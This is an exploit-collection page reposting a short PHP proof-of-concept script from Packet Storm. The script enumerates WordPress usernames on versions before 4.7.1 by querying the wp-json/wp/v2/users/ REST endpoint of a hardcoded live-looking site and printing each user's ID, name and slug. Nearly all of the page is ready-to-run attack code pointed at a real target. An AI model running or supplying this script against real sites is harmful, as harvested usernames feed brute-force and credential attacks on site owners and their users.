WordPress Username Enumeration

Simple PHP proof of concept exploit that demonstrates username enumeration in WordPress versions prior to 4.7.1.

MD5 | c466685d3f06c12ee2ebd82a5c061d89

#!usr/bin/php
<?php
 
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: [email protected]
#Site: https://mateuslino.tk 
header ('Content-type: text/html; charset=UTF-8');
 
 
$url= "https://bucaneiras.org/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
    echo "*-----------------------------*\n";
foreach($json as $users){
    echo "[*] ID :  |" .$users['id']     ."|\n";
    echo "[*] Name: |" .$users['name']   ."|\n";
    echo "[*] User :|" .$users['slug']   ."|\n";
    echo "\n";
}echo "*-----------------------------*";} 
else{echo "[*] No user";}
 
 
?>

Source: packetstormsecurity.com

Exploit Collector

Search Exploit

WordPress Username Enumeration